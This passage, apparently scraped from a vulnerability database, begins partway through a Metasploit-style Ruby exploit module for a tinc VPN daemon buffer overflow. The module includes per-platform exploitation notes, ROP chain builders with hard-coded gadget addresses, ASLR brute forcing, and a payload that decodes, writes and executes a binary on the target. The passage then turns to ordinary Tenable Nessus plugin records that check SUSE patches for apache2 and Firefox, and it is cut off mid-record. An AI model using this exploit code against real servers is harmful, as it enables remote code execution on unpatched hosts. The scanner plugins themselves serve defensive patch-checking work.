brute force)', 3])\r\n ], self\r\n )\r\n end\r\n\r\n def exploit\r\n # #\r\n # x86\r\n # #\r\n # WINDOWS XP and 7 full exploitation\r\n # Simple, we only need some mona.py magic\r\n # C:\\Program Files\\tinc>\"C:\\Program Files\\Immunity Inc\\Immunity Debugger\\ImmunityDebugger.exe\" \"C:\\Program Files\\tinc\\tincd.exe -D -d 5\"\r\n # !mona config -set workingfolder c:\\logs\\%p\r\n # !mona pc 1682\r\n # --> C:\\logs\\tincd\\pattern\r\n # !mona findmsp\r\n # Straight forward, when we overwrite EIP the second value\r\n # on the stack is pointing to our payload.\r\n # !mona findwild -o -type instr -s \"pop r32# ret\"\r\n\r\n # FREEBSD full exploitation\r\n # Same offset as windows, same exploitation method\r\n # But we needed a new pop r32# ret for the freebsd version\r\n # No mona.py help on bsd or linux so:\r\n # - Dumped .text part of tincd binary in gdb\r\n # - Search in hex editor for opcodes for \"pop r32# ret\":\r\n # 58c3, 59c3, ..., 5fc3\r\n # - Found a couple of 5dc3. ret = start of .text + offset in hex editor\r\n # - 0x0804BABB works very well\r\n\r\n # UBUNTU crash only\r\n # Manually compiled version (1.1.pre6) on Ubuntu 12.10 with gcc 4.7.2 seems to be a non-exploitable crash, because\r\n # the bug is in a fixed size (MAXSIZE) struct member variable. The size of the destination is known\r\n # at compile time. gcc is introducing a call to __memcpy_chk:\r\n # http://gcc.gnu.org/svn/gcc/branches/cilkplus/libssp/memcpy-chk.c\r\n # memcpy_chk does a __chk_fail call if the destination buffer is smaller than the source buffer. Therefore it will print\r\n # *** buffer overflow detected *** and terminate (SIGABRT). The same result for tincd 10.0.19 which can be installed\r\n # from the repository. It might be exploitable for versions compiled with an older version of gcc.\r\n # memcpy_chk seems to be in gcc since 2005:\r\n # http://gcc.gnu.org/svn/gcc/branches/cilkplus/libssp/memcpy-chk.c\r\n # http://gcc.gnu.org/git/?p=gcc.git;a=history;f=libssp/memcpy-chk.c;hb=92920cc62318e5e8b6d02d506eaf66c160796088\r\n\r\n # OPENSUSE\r\n # OpenSuse 11.2\r\n # Installation as described on the tincd website. For 11.2 there are two versions.\r\n # Decided for 1.0.16 as this is a vulnerable version\r\n # wget \"http://download.opensuse.org/repositories/home:/seilerphilipp/SLE_11_SP2/i586/tinc-1.0.16-3.1.i586.rpm\"\r\n # rpm -i tinc-1.0.16-3.1.i586.rpm\r\n # Again, strace shows us that the buffer overflow was detected (see Ubuntu)\r\n # writev(2, [{\"*** \", 4}, {\"buffer overflow detected\", 24}, {\" ***: \", 6}, {\"tincd\", 5}, {\" terminated\\n\", 12}], 5) = 51\r\n # So a crash-only non-exploitable bof here. So let's go for manual install:\r\n # wget 'http://www.tinc-vpn.org/packages/tinc-1.0.20.tar.gz'\r\n # yast -i gcc zlib zlib-devel && echo \"yast is still ugly\" && zypper install lzo-devel libopenssl-devel make && make && make install\r\n # Exploitable. Let's see:\r\n # tincd is mapped at 0x8048000. There is a 5d3c at offset 307f in the tincd binary. this means:\r\n # the offset to pop ebp; ret is 0x0804b07f\r\n\r\n # FEDORA\r\n # Fedora 16\r\n # yum has version 1.0.19\r\n # yum install tinc\r\n # Non-exploitable crash, see Ubuntu. Strace tells us:\r\n # writev(2, [{\"*** \", 4}, {\"buffer overflow detected\", 24}, {\" ***: \", 6}, {\"tincd\", 5}, {\" terminated\\n\", 12}], 5) = 51\r\n # About yum: Fedora 17 has fixed version 1.0.21, Fedora 19 fixed version 1.0.23\r\n # Manual compile went on with Fedora 19\r\n # wget 'http://www.tinc-vpn.org/packages/tinc-1.0.20.tar.gz'\r\n # yum install gcc zlib-devel.i686 lzo-devel.i686 openssl-devel.i686 && ./configure && make && make install\r\n # Don't forget to stop firewalld for testing, as the port is still closed otherwise\r\n # # hardening-check tincd\r\n # tincd:\r\n # Position Independent Executable: no, normal executable!\r\n # Stack protected: no, not found!\r\n # Fortify Source functions: no, only unprotected functions found!\r\n # Read-only relocations: yes\r\n # Immediate binding: no, not found!\r\n # Running this module with target set to Windows:\r\n # Program received signal SIGSEGV, Segmentation fault.\r\n # 0x0041caa6 in ?? ()\r\n # well and that's our windows offset...\r\n # (gdb) info proc mappings\r\n # 0x8048000 0x8068000 0x20000 0x0 /usr/local/sbin/tincd\r\n # After finding a normal 5DC3 (pop ebp# ret) at offset 69c3 of the binary we\r\n # can try to execute the payload on the stack, but:\r\n # (gdb) stepi\r\n # Program received signal SIGSEGV, Segmentation fault.\r\n # 0x08e8ee08 in ?? ()\r\n # Digging deeper we find:\r\n # dmesg | grep protection\r\n # [ 0.000000] NX (Execute Disable) protection: active\r\n # or:\r\n # # objdump -x /usr/local/sbin/tincd\r\n # [...] STACK off 0x00000000 vaddr 0x00000000 paddr 0x00000000 align 2**4\r\n # filesz 0x00000000 memsz 0x00000000 flags rw-\r\n # or: https://bugzilla.redhat.com/show_bug.cgi?id=996365\r\n # Time for ROP\r\n # To start the ROP we need a POP r32# POP ESP# RET (using the first four bytes of the shellcode\r\n # as a pointer to instructions). Was lucky after some searching:\r\n # (gdb) x/10i 0x4d10ee87\r\n # 0x4d10ee87: pop %ebx\r\n # 0x4d10ee88: mov $0xf5d299dd,%eax\r\n # 0x4d10ee8d: rcr %cl,%al\r\n # 0x4d10ee8f: pop %esp\r\n # 0x4d10ee90: ret\r\n\r\n # ARCHLINUX\r\n # archlinux-2013.04.01 pacman has fixed version 1.0.23, so went for manual compile:\r\n # wget 'http://www.tinc-vpn.org/packages/tinc-1.0.20.tar.gz'\r\n # pacman -S gcc zlib lzo openssl make && ./configure && make && make install\r\n # Offset in binary to 58c3: 0x1D929 + tincd is mapped at starting address 0x8048000\r\n # -->Ret: 0x8065929\r\n # No NX protection, it simply runs the shellcode :)\r\n\r\n # #\r\n # ARM\r\n # #\r\n # ARM Pidora 18 (Raspberry Pi Fedora Remix) on a physical Raspberry Pi\r\n # Although this is more for the interested reader, as Pidora development\r\n # already stopped... Raspberry Pi's are ARM1176JZF-S (700 MHz) CPUs\r\n # meaning it's an ARMv6 architecture\r\n # yum has fixed version 1.0.21, so went for manual compile:\r\n # wget 'http://www.tinc-vpn.org/packages/tinc-1.0.20.tar.gz'\r\n # yum install gdb gcc zlib-devel lzo-devel openssl-devel && ./configure && make && make install\r\n # Is the binary protected?\r\n # wget \"http://www.trapkit.de/tools/checksec.sh\" && chmod +x checksec.sh\r\n # # ./checksec.sh --file /usr/local/sbin/tincd\r\n # RELRO STACK CANARY NX PIE RPATH RUNPATH FILE\r\n # No RELRO No canary found NX enabled No PIE No RPATH No RUNPATH /usr/local/sbin/tincd\r\n # so again NX... but what about the system things?\r\n # cat /proc/sys/kernel/randomize_va_space\r\n # 2\r\n # --> \"Randomize the positions of the stack, VDSO page, shared memory regions, and the data segment.\r\n # This is the default setting.\"\r\n # Here some examples of the address of the system function:\r\n # 0xb6c40848\r\n # 0xb6cdd848\r\n # 0xb6c7c848\r\n # Looks like we would have to brute force one byte\r\n # (gdb) info proc mappings\r\n # 0x8000 0x23000 0x1b000 0 /usr/local/sbin/tincd\r\n # 0x2b000 0x2c000 0x1000 0x1b000 /usr/local/sbin/tincd\r\n # When we exploit we get the following:\r\n # Program received signal SIGSEGV, Segmentation fault.\r\n # 0x90909090 in ?? ()\r\n # ok, finally a different offset to eip. Let's figure it out:\r\n # $ tools/pattern_create.rb 1676\r\n # Ok, pretty close, it's 1668. If we randomly choose ret as 0x9000 we get:\r\n # (gdb) break *0x9000\r\n # Breakpoint 1 at 0x9000\r\n # See that our shellcode is *on* the stack:\r\n # (gdb) x/10x $sp\r\n # 0xbee14308: 0x00000698 0x00000000 0x00000000 0x00000698\r\n # 0xbee14318: 0x31203731 0x0a323736 0xe3a00002 0xe3a01001 <-- 0xe3a00002 is the start of our shellcode\r\n # 0xbee14328: 0xe3a02006 0xe3a07001\r\n # let's explore the code we can reuse:\r\n # (gdb) info functions\r\n # objdump -d /usr/local/sbin/tincd >assembly.txt\r\n # while simply searching for the bx instruction we were not very lucky,\r\n # but searching for some \"pop pc\" it's easy to find nice gadgets.\r\n # we can write arguments to the .data section again:\r\n # 0x2b3f0->0x2b4ac at 0x0001b3f0: .data ALLOC LOAD DATA HAS_CONTENTS\r\n # The problem is we can not reliably forecast the system function's address, but it's\r\n # only one byte random, therefore we have to brute force it and/or find a memory leak.\r\n # Let's assume it's a restarting daemon:\r\n # create /etc/systemd/system/tincd.service and fill in Restart=restart-always\r\n\r\n # ARM Debian Wheezy on qemu\r\n # [email\u00a0protected]:~# apt-cache showpkg tinc\r\n # Package: tinc\r\n # Versions:\r\n # 1.0.19-3 (/var/lib/apt/lists/ftp.halifax.rwth-aachen.de_debian_dists_wheezy_main_binary-armhf_Packages)\r\n # nice, that's vulnerable\r\n # apt-get install tinc\r\n # apt-get install elfutils && ln -s /usr/bin/eu-readelf /usr/bin/readelf\r\n # wget \"http://www.trapkit.de/tools/checksec.sh\" && chmod +x checksec.sh\r\n # # ./checksec.sh --file /usr/sbin/tincd\r\n # RELRO STACK CANARY NX PIE RPATH RUNPATH FILE\r\n # Partial RELRO Canary found NX enabled No PIE No RPATH No RUNPATH /usr/sbin/tincd\r\n # Puh, doesn't look too good for us, NX enabled, Stack canary present and a partial RELRO, I'm not going to cover this one here\r\n\r\n packet_payload = payload.encoded\r\n # Pidora and Fedora/ROP specific things\r\n if target.name =~ /Pidora 18/ || target.name =~ /Fedora 19/\r\n rop_generator = nil\r\n filename = rand_text_alpha(1)\r\n cd = \"cd #{datastore['BINARY_DROP_LOCATION']};\"\r\n cd = '' if datastore['BINARY_DROP_LOCATION'] == '.'\r\n\r\n if target.name =~ /Pidora 18/\r\n print_status('Using ROP and brute force ASLR guesses to defeat NX/ASLR on ARMv6 based Pidora 18')\r\n print_status('This requires a restarting tincd daemon!')\r\n print_status('Warning: This is likely to get tincd into a state where it doesn\\'t accept connections anymore')\r\n rop_generator = method(:create_pidora_rop)\r\n elsif target.name =~ /Fedora 19/\r\n print_status('Using ROP to defeat NX on Fedora 19')\r\n rop_generator = method(:create_fedora_rop)\r\n end\r\n\r\n if target.arch.include? ARCH_CMD\r\n # The CMD payloads are a bit tricky on Fedora. As of december 2013\r\n # some of the generic unix payloads (e.g. reverse shell with awk) don't work\r\n # (even when executed directly in a terminal on Fedora)\r\n # use generic/custom and specify PAYLOADSTR without single quotes\r\n # it's usually sh -c *bla*\r\n packet_payload = create_fedora_rop(payload.encoded.split(' ', 3))\r\n else\r\n # the binary drop payloads\r\n packet_payload = get_cmd_binary_drop_payload(filename, cd, rop_generator)\r\n if packet_payload.length > target['offset']\r\n print_status(\"Plain version too big (#{packet_payload.length}, max. #{target['offset']}), trying zipped version\")\r\n packet_payload = get_gzip_cmd_binary_drop_payload(filename, cd, rop_generator)\r\n vprint_status(\"Achieved version with #{packet_payload.length} bytes\")\r\n end\r\n end\r\n end\r\n\r\n if packet_payload.length > target['offset']\r\n fail_with(Exploit::Failure::BadConfig, \"The resulting payload has #{packet_payload.length} bytes, we only have #{target['offset']} space.\")\r\n end\r\n injection = packet_payload + rand_text_alpha(target['offset'] - packet_payload.length) + [target.ret].pack('V')\r\n\r\n vprint_status(\"Injection starts with #{injection.unpack('H*')[0][0..30]}...\")\r\n\r\n if target.name =~ /Pidora 18/\r\n # we have to brute force to defeat ASLR\r\n datastore['BRUTEFORCE_TRIES'].times do\r\n print_status(\"Try #{n}: Initializing tinc exploit client (setting up ciphers)\")\r\n setup_ciphers\r\n print_status('Telling tinc exploit client to connect, handshake and send the payload')\r\n begin\r\n send_recv(injection)\r\n rescue RuntimeError, Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, ::Timeout::Error, ::EOFError => runtime_error\r\n print_error(runtime_error.message)\r\n print_error(runtime_error.backtrace.join(\"\\n\\t\"))\r\n rescue Rex::ConnectionRefused\r\n print_error('Server refused connection. Is this really a restarting daemon? Try higher WAIT option.')\r\n sleep(3)\r\n next\r\n end\r\n secs = datastore['WAIT']\r\n print_status(\"Waiting #{secs} seconds for server to restart daemon (which will change the ASLR byte)\")\r\n sleep(secs)\r\n end\r\n print_status(\"Brute force with #{datastore['BRUTEFORCE_TRIES']} tries done. If not successful you could try again.\")\r\n else\r\n # Setup local ciphers\r\n print_status('Initializing tinc exploit client (setting up ciphers)')\r\n setup_ciphers\r\n # The tincdExploitClient will do the crypto handshake with the server and\r\n # send the injection (a packet), where the actual buffer overflow is triggered\r\n print_status('Telling tinc exploit client to connect, handshake and send the payload')\r\n send_recv(injection)\r\n end\r\n print_status('Exploit finished')\r\n end\r\n\r\n def get_cmd_binary_drop_payload(filename, cd, rop_generator)\r\n elf_base64 = Rex::Text.encode_base64(generate_payload_exe)\r\n cmd = ['/bin/sh', '-c', \"#{cd}echo #{elf_base64}|base64 -d>#{filename};chmod +x #{filename};./#{filename}\"]\r\n vprint_status(\"You will try to execute #{cmd.join(' ')}\")\r\n rop_generator.call(cmd)\r\n end\r\n\r\n def get_gzip_cmd_binary_drop_payload(filename, cd, rop_generator)\r\n elf_zipped_base64 = Rex::Text.encode_base64(Rex::Text.gzip(generate_payload_exe))\r\n cmd = ['/bin/sh', '-c', \"#{cd}echo #{elf_zipped_base64}|base64 -d|gunzip>#{filename};chmod +x #{filename};./#{filename}\"]\r\n vprint_status(\"You will try to execute #{cmd.join(' ')}\")\r\n rop_generator.call(cmd)\r\n end\r\n\r\n def create_pidora_rop(sys_execv_args)\r\n sys_execv_args = sys_execv_args.join(' ')\r\n sys_execv_args += \"\\x00\"\r\n\r\n aslr_byte_guess = SecureRandom.random_bytes(1).ord\r\n print_status(\"Using 0x#{aslr_byte_guess.to_s(16)} as random byte for ASLR brute force (hope the server will use the same at one point)\")\r\n\r\n # Gadgets tincd\r\n # c714: e1a00004 mov r0, r4\r\n # c718: e8bd8010 pop {r4, pc}\r\n mov_r0_r4_pop_r4_ret = [0x0000c714].pack('V')\r\n pop_r4_ret = [0x0000c718].pack('V')\r\n # 1cef4: e580400c str r4, [r0, #12]\r\n # 1cef8: e8bd8010 pop {r4, pc}\r\n # mov_r0_plus_12_to_r4_pop_r4_ret = [0x0001cef4].pack('V')\r\n\r\n # bba0: e5843000 str r3, [r4]\r\n # bba4: e8bd8010 pop {r4, pc}\r\n mov_to_r4_addr_pop_r4_ret = [0x0000bba0].pack('V')\r\n\r\n # 13ccc: e1a00003 mov r0, r3\r\n # 13cd0: e8bd8008 pop {r3, pc}\r\n pop_r3_ret = [0x00013cd0].pack('V')\r\n\r\n # address to start rop (removing 6 addresses of garbage from stack)\r\n # 15cb4: e8bd85f0 pop {r4, r5, r6, r7, r8, sl, pc}\r\n # start_rop = [0x00015cb4].pack('V')\r\n # see target Ret\r\n\r\n # system function address base to brute force\r\n # roughly 500 tests showed addresses between\r\n # 0xb6c18848 and 0xb6d17848 (0xff distance)\r\n system_addr = [0xb6c18848 + (aslr_byte_guess * 0x1000)].pack('V')\r\n\r\n # pointer into .data section\r\n loc_dot_data = 0x0002b3f0 # a location inside .data\r\n\r\n # Rop into system(), prepare address of payload in r0\r\n rop = ''\r\n\r\n # first, let's put the payload into the .data section\r\n\r\n # Put the first location to write to in r4\r\n rop += pop_r4_ret\r\n\r\n sys_execv_args.scan(/.{1,4}/).each_with_index do |argument_part, i|\r\n # Give location inside .data via stack\r\n rop += [loc_dot_data + i * 4].pack('V')\r\n # Pop 4 bytes of the command into r3\r\n rop += pop_r3_ret\r\n # Give 4 bytes of command on stack\r\n if argument_part.length == 4\r\n rop += argument_part\r\n else\r\n rop += argument_part + rand_text_alpha(4 - argument_part.length)\r\n end\r\n # Write the 4 bytes to the writable location\r\n rop += mov_to_r4_addr_pop_r4_ret\r\n end\r\n\r\n # put the address of the payload into r4\r\n rop += [loc_dot_data].pack('V')\r\n\r\n # now move r4 to r0\r\n rop += mov_r0_r4_pop_r4_ret\r\n rop += rand_text_alpha(4)\r\n # we don't care what ends up in r4 now\r\n\r\n # call system\r\n rop += system_addr\r\n end\r\n\r\n def create_fedora_rop(sys_execv_args)\r\n # Gadgets tincd\r\n loc_dot_data = 0x80692e0 # a location inside .data\r\n pop_eax = [0x8065969].pack('V') # pop eax; ret\r\n pop_ebx = [0x8049d8d].pack('V') # pop ebx; ret\r\n pop_ecx = [0x804e113].pack('V') # pop ecx; ret\r\n xor_eax_eax = [0x804cd60].pack('V') # xor eax eax; ret\r\n # <ATTENTION> This one destroys ebx:\r\n mov_to_eax_addr = [0x805f2c2].pack('V') + rand_text_alpha(4) # mov [eax] ecx ; pop ebx ; ret\r\n # </ATTENTION>\r\n\r\n # Gadgets libcrypto.so.10 libcrypto.so.1.0.1e\r\n xchg_ecx_eax = [0x4d170d1f].pack('V') # xchg ecx,eax; ret\r\n # xchg_edx_eax = [0x4d25afa3].pack('V') # xchg edx,eax ; ret\r\n # inc_eax = [0x4d119ebc].pack('V') # inc eax ; ret\r\n\r\n # Gadgets libc.so.6 libc-2.17.so\r\n pop_edx = [0x4b5d7aaa].pack('V') # pop edx; ret\r\n int_80 = [0x4b6049c5].pack('V') # int 0x80\r\n\r\n # Linux kernel system call 11: sys_execve\r\n # ROP\r\n rop = ''\r\n\r\n index = 0\r\n stored_argument_pointer_offsets = []\r\n\r\n sys_execv_args.each_with_index do |argument, argument_no|\r\n stored_argument_pointer_offsets << index\r\n argument.scan(/.{1,4}/).each_with_index do |argument_part, i|\r\n # Put location to write to in eax\r\n rop += pop_eax\r\n # Give location inside .data via stack\r\n rop += [loc_dot_data + index + i * 4].pack('V')\r\n # Pop 4 bytes of the command into ecx\r\n rop += pop_ecx\r\n # Give 4 bytes of command on stack\r\n if argument_part.length == 4\r\n rop += argument_part\r\n else\r\n rop += argument_part + rand_text_alpha(4 - argument_part.length)\r\n end\r\n # Write the 4 bytes to the writable location\r\n rop += mov_to_eax_addr\r\n end\r\n # We have to end the argument with a zero byte\r\n index += argument.length\r\n # We don't have \"xor ecx, ecx\", but we have it for eax...\r\n rop += xor_eax_eax\r\n rop += xchg_ecx_eax\r\n # Put location to write to in eax\r\n rop += pop_eax\r\n # Give location inside .data via stack\r\n rop += [loc_dot_data + index].pack('V')\r\n # Write the zeros\r\n rop += mov_to_eax_addr\r\n index += 1 # where we can write the next argument\r\n end\r\n\r\n # Append address of the start of each argument\r\n stored_argument_pointer_offsets.each do |offset|\r\n rop += pop_eax\r\n rop += [loc_dot_data + index].pack('V')\r\n rop += pop_ecx\r\n rop += [loc_dot_data + offset].pack('V')\r\n rop += mov_to_eax_addr\r\n index += 4\r\n end\r\n # end with zero\r\n rop += xor_eax_eax\r\n rop += xchg_ecx_eax\r\n\r\n rop += pop_eax\r\n rop += [loc_dot_data + index].pack('V')\r\n rop += mov_to_eax_addr\r\n\r\n rop += pop_ebx\r\n rop += [loc_dot_data].pack('V')\r\n\r\n rop += pop_ecx\r\n rop += [loc_dot_data + sys_execv_args.join(' ').length + 1].pack('V')\r\n\r\n rop += pop_edx\r\n rop += [loc_dot_data + index].pack('V')\r\n\r\n # sys call 11 = sys_execve\r\n rop += pop_eax\r\n rop += [0x0000000b].pack('V')\r\n\r\n rop += int_80\r\n end\r\nend\n\n# 0day.today [2018-01-05] #", "cvss": {"score": 6.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/22960"}], "nessus": [{"lastseen": "2019-02-21T01:33:20", "bulletinFamily": "scanner", "description": "This update for apache2 fixes one issues. This security issue was fixed :\n\n - CVE-2017-9798: Prevent use-after-free use of memory that allowed for an information leak via OPTIONS (bsc#1058058)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "modified": "2018-11-30T00:00:00", "id": "SUSE_SU-2017-2718-1.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=103833", "published": "2017-10-13T00:00:00", "title": "SUSE SLES12 Security Update : apache2 (SUSE-SU-2017:2718-1) (Optionsbleed)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2017:2718-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(103833);\n script_version(\"3.5\");\n script_cvs_date(\"Date: 2018/11/30 10:54:51\");\n\n script_cve_id(\"CVE-2017-9798\");\n\n script_name(english:\"SUSE SLES12 Security Update : apache2 (SUSE-SU-2017:2718-1) (Optionsbleed)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for apache2 fixes one issues. This security issue was\nfixed :\n\n - CVE-2017-9798: Prevent use-after-free use of memory that\n allowed for an information leak via OPTIONS\n (bsc#1058058)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1058058\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-9798/\"\n );\n # https://www.suse.com/support/update/announcement/2017/suse-su-20172718-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?b3bb4ad6\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use YaST online_update.\nAlternatively you can run the command listed for your product :\n\nSUSE OpenStack Cloud 6:zypper in -t patch\nSUSE-OpenStack-Cloud-6-2017-1682=1\n\nSUSE Linux Enterprise Server for SAP 12-SP1:zypper in -t patch\nSUSE-SLE-SAP-12-SP1-2017-1682=1\n\nSUSE Linux Enterprise Server 12-SP1-LTSS:zypper in -t patch\nSUSE-SLE-SERVER-12-SP1-2017-1682=1\n\nTo bring your system up-to-date, use 'zypper patch'.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:apache2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:apache2-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:apache2-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:apache2-example-pages\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:apache2-prefork\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:apache2-prefork-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:apache2-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:apache2-utils-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:apache2-worker\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:apache2-worker-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/10/12\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/10/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = eregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^(SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! ereg(pattern:\"^(1)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP1\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"apache2-2.4.16-20.13.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"apache2-debuginfo-2.4.16-20.13.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"apache2-debugsource-2.4.16-20.13.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"apache2-example-pages-2.4.16-20.13.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"apache2-prefork-2.4.16-20.13.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"apache2-prefork-debuginfo-2.4.16-20.13.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"apache2-utils-2.4.16-20.13.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"apache2-utils-debuginfo-2.4.16-20.13.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"apache2-worker-2.4.16-20.13.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"apache2-worker-debuginfo-2.4.16-20.13.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"apache2\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2019-02-21T01:25:03", "bulletinFamily": "scanner", "description": "Mozilla Firefox is being updated to the current Firefox 38ESR branch (specifically the 38.2.0ESR release).\n\nSecurity issues fixed :\n\n - MFSA 2015-78 / CVE-2015-4495: Same origin violation and local file stealing via PDF reader\n\n - MFSA 2015-79 / CVE-2015-4473/CVE-2015-4474:\n Miscellaneous memory safety hazards (rv:40.0 / rv:38.2)\n\n - MFSA 2015-80 / CVE-2015-4475: Out-of-bounds read with malformed MP3 file\n\n - MFSA 2015-82 / CVE-2015-4478: Redefinition of non-configurable JavaScript object properties\n\n - MFSA 2015-83 / CVE-2015-4479: Overflow issues in libstagefright\n\n - MFSA 2015-87 / CVE-2015-4484: Crash when using shared memory in JavaScript\n\n - MFSA 2015-88 / CVE-2015-4491: Heap overflow in gdk-pixbuf when scaling bitmap images\n\n - MFSA 2015-89 / CVE-2015-4485/CVE-2015-4486: Buffer overflows on Libvpx when decoding WebM video\n\n - MFSA 2015-90 / CVE-2015-4487/CVE-2015-4488/CVE-2015-4489:\n Vulnerabilities found through code inspection\n\n - MFSA 2015-92 / CVE-2015-4492: Use-after-free in XMLHttpRequest with shared workers\n\nThis update also contains a lot of feature improvements and bug fixes from 31ESR to 38ESR.\n\nAlso the Mozilla NSS library switched its CKBI API from 1.98 to 2.4, which is what Firefox 38ESR uses.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "modified": "2018-11-29T00:00:00", "id": "SUSE_SU-2015-1528-1.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=85906", "published": "2015-09-11T00:00:00", "title": "SUSE SLED11 / SLES11 Security Update : MozillaFirefox, mozilla-nss (SUSE-SU-2015:1528-1)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2015:1528-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(85906);\n script_version(\"2.6\");\n script_cvs_date(\"Date: 2018/11/29 